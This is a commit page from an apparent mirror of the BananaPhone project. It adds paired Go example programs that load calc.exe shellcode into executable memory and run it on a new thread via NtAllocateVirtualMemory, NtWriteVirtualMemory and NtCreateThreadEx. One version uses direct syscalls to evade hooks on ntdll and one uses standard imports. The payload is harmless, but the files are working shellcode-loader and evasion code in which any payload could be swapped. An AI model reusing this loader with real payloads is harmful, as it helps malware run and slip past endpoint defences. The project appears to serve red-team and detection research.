Projects STRLCPY BananaPhone Commits bb4ce98b
🤬
  • ■ ■ ■ ■ ■ ■
    example/hideexample/banana/main.go
     1 +package main
     2 + 
     3 +import (
     4 + "syscall"
     5 +)
     6 + 
     7 +var shellcode = []byte{
     8 + //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
     9 + 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
     10 + 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
     11 + 0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
     12 + 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
     13 + 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
     14 + 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
     15 + 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
     16 + 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
     17 + 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
     18 + 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
     19 + 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
     20 + 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
     21 + 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
     22 + 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
     23 + 0xd7,
     24 +}
     25 + 
     26 +func main() {
     27 + const (
     28 + thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle.
     29 + memCommit = uintptr(0x00001000)
     30 + memreserve = uintptr(0x00002000)
     31 + )
     32 + 
     33 + var baseA uintptr
     34 + regionsize := uint32(len(shellcode))
     35 + NtAllocateVirtualMemory(thisThread,
     36 + &baseA,
     37 + 0,
     38 + &regionsize,
     39 + uint32(memCommit|memreserve),
     40 + syscall.PAGE_EXECUTE_READWRITE,
     41 + )
     42 + var written uintptr
     43 + NtWriteVirtualMemory(thisThread, baseA, &shellcode[0], uintptr(len(shellcode)), &written)
     44 + 
     45 + var hhosthread uintptr
     46 + NtCreateThreadEx( //NtCreateThreadEx
     47 + &hhosthread, //hthread
     48 + 0x1FFFFF, //desiredaccess
     49 + 0, //objattributes
     50 + thisThread, //processhandle
     51 + baseA, //lpstartaddress
     52 + 0, //lpparam
     53 + uintptr(0), //createsuspended
     54 + 0, //zerobits
     55 + 0, //sizeofstackcommit
     56 + 0, //sizeofstackreserve
     57 + 0, //lpbytesbuffer
     58 + )
     59 + syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff)
     60 + 
     61 +}
     62 + 
  • ■ ■ ■ ■ ■ ■
    example/hideexample/banana/syscalls.go
     1 +package main
     2 + 
     3 +//dsys NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) = ntdll.NtWriteVirtualMemory
     4 +//dsys NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) = ntdll.NtAllocateVirtualMemory
     5 +//dsys NtProtectVirtualMemory(hProcess uintptr, lpAddress *uintptr, dwSize *uintptr, flNewProtect uint32, lpflOldProtect *uint32) (err error) = ntdll.NtProtectVirtualMemory
     6 +//dsys NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) = ntdll.NtCreateThreadEx
     7 + 
     8 +//go:generate go run github.com/C-Sto/BananaPhone/cmd/mkdirectwinsyscall -trace -output zsyscall_windows.go syscalls.go
     9 + 
  • ■ ■ ■ ■ ■ ■
    example/hideexample/banana/zsyscall_windows.go
     1 +// Code generated by 'go generate'; DO NOT EDIT.
     2 + 
     3 +package main
     4 + 
     5 +import (
     6 + "fmt"
     7 + "unsafe"
     8 + 
     9 + bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone"
     10 +)
     11 + 
     12 +var _ unsafe.Pointer
     13 + 
     14 +var (
     15 + bpGlobal, bperr = bananaphone.NewBananaPhone(bananaphone.AutoBananaPhoneMode)
     16 +)
     17 + 
     18 +func NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
     19 + if bpGlobal == nil {
     20 + err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
     21 + return
     22 + }
     23 + 
     24 + sysid, e := bpGlobal.GetSysID("NtWriteVirtualMemory")
     25 + if e != nil {
     26 + err = e
     27 + return
     28 + }
     29 + r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(lpBaseAddress), uintptr(unsafe.Pointer(lpBuffer)), uintptr(nSize), uintptr(unsafe.Pointer(lpNumberOfBytesWritten)))
     30 + if r1 != 0 {
     31 + err = fmt.Errorf("error code: %x", r1)
     32 + }
     33 + print("SYSCALL: NtWriteVirtualMemory(", "hProcess=", hProcess, ", ", "lpBaseAddress=", lpBaseAddress, ", ", "lpBuffer=", lpBuffer, ", ", "nSize=", nSize, ", ", "lpNumberOfBytesWritten=", lpNumberOfBytesWritten, ") (", "err=", err, ")\n")
     34 + return
     35 +}
     36 + 
     37 +func NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) {
     38 + if bpGlobal == nil {
     39 + err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
     40 + return
     41 + }
     42 + 
     43 + sysid, e := bpGlobal.GetSysID("NtAllocateVirtualMemory")
     44 + if e != nil {
     45 + err = e
     46 + return
     47 + }
     48 + r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(zerobits), uintptr(unsafe.Pointer(dwSize)), uintptr(flAllocationType), uintptr(flProtect))
     49 + if r1 != 0 {
     50 + err = fmt.Errorf("error code: %x", r1)
     51 + }
     52 + print("SYSCALL: NtAllocateVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "zerobits=", zerobits, ", ", "dwSize=", dwSize, ", ", "flAllocationType=", flAllocationType, ", ", "flProtect=", flProtect, ") (", "err=", err, ")\n")
     53 + return
     54 +}
     55 + 
     56 +func NtProtectVirtualMemory(hProcess uintptr, lpAddress *uintptr, dwSize *uintptr, flNewProtect uint32, lpflOldProtect *uint32) (err error) {
     57 + if bpGlobal == nil {
     58 + err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
     59 + return
     60 + }
     61 + 
     62 + sysid, e := bpGlobal.GetSysID("NtProtectVirtualMemory")
     63 + if e != nil {
     64 + err = e
     65 + return
     66 + }
     67 + r1, _ := bananaphone.Syscall(sysid, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(unsafe.Pointer(dwSize)), uintptr(flNewProtect), uintptr(unsafe.Pointer(lpflOldProtect)))
     68 + if r1 != 0 {
     69 + err = fmt.Errorf("error code: %x", r1)
     70 + }
     71 + print("SYSCALL: NtProtectVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "dwSize=", dwSize, ", ", "flNewProtect=", flNewProtect, ", ", "lpflOldProtect=", lpflOldProtect, ") (", "err=", err, ")\n")
     72 + return
     73 +}
     74 + 
     75 +func NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) {
     76 + if bpGlobal == nil {
     77 + err = fmt.Errorf("BananaPhone uninitialised: %s", bperr.Error())
     78 + return
     79 + }
     80 + 
     81 + sysid, e := bpGlobal.GetSysID("NtCreateThreadEx")
     82 + if e != nil {
     83 + err = e
     84 + return
     85 + }
     86 + r1, _ := bananaphone.Syscall(sysid, uintptr(unsafe.Pointer(hThread)), uintptr(desiredaccess), uintptr(objattrib), uintptr(processhandle), uintptr(lpstartaddr), uintptr(lpparam), uintptr(createsuspended), uintptr(zerobits), uintptr(sizeofstack), uintptr(sizeofstackreserve), uintptr(lpbytesbuffer))
     87 + if r1 != 0 {
     88 + err = fmt.Errorf("error code: %x", r1)
     89 + }
     90 + print("SYSCALL: NtCreateThreadEx(", "hThread=", hThread, ", ", "desiredaccess=", desiredaccess, ", ", "objattrib=", objattrib, ", ", "processhandle=", processhandle, ", ", "lpstartaddr=", lpstartaddr, ", ", "lpparam=", lpparam, ", ", "createsuspended=", createsuspended, ", ", "zerobits=", zerobits, ", ", "sizeofstack=", sizeofstack, ", ", "sizeofstackreserve=", sizeofstackreserve, ", ", "lpbytesbuffer=", lpbytesbuffer, ") (", "err=", err, ")\n")
     91 + return
     92 +}
     93 + 
  • ■ ■ ■ ■ ■ ■
    example/hideexample/nobanana/main.go
     1 +package main
     2 + 
     3 +import (
     4 + "syscall"
     5 +)
     6 + 
     7 +var shellcode = []byte{
     8 + //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
     9 + 0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
     10 + 0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
     11 + 0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
     12 + 0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
     13 + 0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
     14 + 0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
     15 + 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
     16 + 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
     17 + 0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
     18 + 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
     19 + 0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
     20 + 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
     21 + 0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
     22 + 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
     23 + 0xd7,
     24 +}
     25 + 
     26 +func main() {
     27 + const (
     28 + thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle.
     29 + memCommit = uintptr(0x00001000)
     30 + memreserve = uintptr(0x00002000)
     31 + )
     32 + 
     33 + var baseA uintptr
     34 + regionsize := uint32(len(shellcode))
     35 + NtAllocateVirtualMemory(thisThread,
     36 + &baseA,
     37 + 0,
     38 + &regionsize,
     39 + uint32(memCommit|memreserve),
     40 + syscall.PAGE_EXECUTE_READWRITE,
     41 + )
     42 + var written uintptr
     43 + NtWriteVirtualMemory(thisThread, baseA, &shellcode[0], uintptr(len(shellcode)), &written)
     44 + 
     45 + var hhosthread uintptr
     46 + NtCreateThreadEx( //NtCreateThreadEx
     47 + &hhosthread, //hthread
     48 + 0x1FFFFF, //desiredaccess
     49 + 0, //objattributes
     50 + thisThread, //processhandle
     51 + baseA, //lpstartaddress
     52 + 0, //lpparam
     53 + uintptr(0), //createsuspended
     54 + 0, //zerobits
     55 + 0, //sizeofstackcommit
     56 + 0, //sizeofstackreserve
     57 + 0, //lpbytesbuffer
     58 + )
     59 + syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff)
     60 + 
     61 +}
     62 + 
  • ■ ■ ■ ■ ■ ■
    example/hideexample/nobanana/syscalls.go
     1 +package main
     2 + 
     3 +//sys NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) = ntdll.NtWriteVirtualMemory
     4 +//sys NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) = ntdll.NtAllocateVirtualMemory
     5 +//sys NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) = ntdll.NtCreateThreadEx
     6 + 
     7 +//go:generate go run $GOPATH/src/golang.org/x/sys/windows/mkwinsyscall -trace -output zsyscalls_windows.go syscalls.go
     8 + 
  • ■ ■ ■ ■ ■ ■
    example/hideexample/nobanana/zsyscalls_windows.go
     1 +// Code generated by 'go generate'; DO NOT EDIT.
     2 + 
     3 +package main
     4 + 
     5 +import (
     6 + "syscall"
     7 + "unsafe"
     8 + 
     9 + "golang.org/x/sys/windows"
     10 +)
     11 + 
     12 +var _ unsafe.Pointer
     13 + 
     14 +// Do the interface allocations only once for common
     15 +// Errno values.
     16 +const (
     17 + errnoERROR_IO_PENDING = 997
     18 +)
     19 + 
     20 +var (
     21 + errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
     22 +)
     23 + 
     24 +// errnoErr returns common boxed Errno values, to prevent
     25 +// allocations at runtime.
     26 +func errnoErr(e syscall.Errno) error {
     27 + switch e {
     28 + case 0:
     29 + return nil
     30 + case errnoERROR_IO_PENDING:
     31 + return errERROR_IO_PENDING
     32 + }
     33 + // TODO: add more here, after collecting data on the common
     34 + // error values see on Windows. (perhaps when running
     35 + // all.bat?)
     36 + return e
     37 +}
     38 + 
     39 +var (
     40 + modntdll = windows.NewLazySystemDLL("ntdll.dll")
     41 + 
     42 + procNtWriteVirtualMemory = modntdll.NewProc("NtWriteVirtualMemory")
     43 + procNtAllocateVirtualMemory = modntdll.NewProc("NtAllocateVirtualMemory")
     44 + procNtCreateThreadEx = modntdll.NewProc("NtCreateThreadEx")
     45 +)
     46 + 
     47 +func NtWriteVirtualMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
     48 + r1, _, e1 := syscall.Syscall6(procNtWriteVirtualMemory.Addr(), 5, uintptr(hProcess), uintptr(lpBaseAddress), uintptr(unsafe.Pointer(lpBuffer)), uintptr(nSize), uintptr(unsafe.Pointer(lpNumberOfBytesWritten)), 0)
     49 + if r1 == 0 {
     50 + if e1 != 0 {
     51 + err = errnoErr(e1)
     52 + } else {
     53 + err = syscall.EINVAL
     54 + }
     55 + }
     56 + print("SYSCALL: NtWriteVirtualMemory(", "hProcess=", hProcess, ", ", "lpBaseAddress=", lpBaseAddress, ", ", "lpBuffer=", lpBuffer, ", ", "nSize=", nSize, ", ", "lpNumberOfBytesWritten=", lpNumberOfBytesWritten, ") (", "err=", err, ")\n")
     57 + return
     58 +}
     59 + 
     60 +func NtAllocateVirtualMemory(hProcess uintptr, lpAddress *uintptr, zerobits uintptr, dwSize *uint32, flAllocationType uint32, flProtect uint32) (err error) {
     61 + r1, _, e1 := syscall.Syscall6(procNtAllocateVirtualMemory.Addr(), 6, uintptr(hProcess), uintptr(unsafe.Pointer(lpAddress)), uintptr(zerobits), uintptr(unsafe.Pointer(dwSize)), uintptr(flAllocationType), uintptr(flProtect))
     62 + if r1 == 0 {
     63 + if e1 != 0 {
     64 + err = errnoErr(e1)
     65 + } else {
     66 + err = syscall.EINVAL
     67 + }
     68 + }
     69 + print("SYSCALL: NtAllocateVirtualMemory(", "hProcess=", hProcess, ", ", "lpAddress=", lpAddress, ", ", "zerobits=", zerobits, ", ", "dwSize=", dwSize, ", ", "flAllocationType=", flAllocationType, ", ", "flProtect=", flProtect, ") (", "err=", err, ")\n")
     70 + return
     71 +}
     72 + 
     73 +func NtCreateThreadEx(hThread *uintptr, desiredaccess uintptr, objattrib uintptr, processhandle uintptr, lpstartaddr uintptr, lpparam uintptr, createsuspended uintptr, zerobits uintptr, sizeofstack uintptr, sizeofstackreserve uintptr, lpbytesbuffer uintptr) (err error) {
     74 + r1, _, e1 := syscall.Syscall12(procNtCreateThreadEx.Addr(), 11, uintptr(unsafe.Pointer(hThread)), uintptr(desiredaccess), uintptr(objattrib), uintptr(processhandle), uintptr(lpstartaddr), uintptr(lpparam), uintptr(createsuspended), uintptr(zerobits), uintptr(sizeofstack), uintptr(sizeofstackreserve), uintptr(lpbytesbuffer), 0)
     75 + if r1 == 0 {
     76 + if e1 != 0 {
     77 + err = errnoErr(e1)
     78 + } else {
     79 + err = syscall.EINVAL
     80 + }
     81 + }
     82 + print("SYSCALL: NtCreateThreadEx(", "hThread=", hThread, ", ", "desiredaccess=", desiredaccess, ", ", "objattrib=", objattrib, ", ", "processhandle=", processhandle, ", ", "lpstartaddr=", lpstartaddr, ", ", "lpparam=", lpparam, ", ", "createsuspended=", createsuspended, ", ", "zerobits=", zerobits, ", ", "sizeofstack=", sizeofstack, ", ", "sizeofstackreserve=", sizeofstackreserve, ", ", "lpbytesbuffer=", lpbytesbuffer, ") (", "err=", err, ")\n")
     83 + return
     84 +}
     85 + 
Please wait...
Page is in error, reload to recover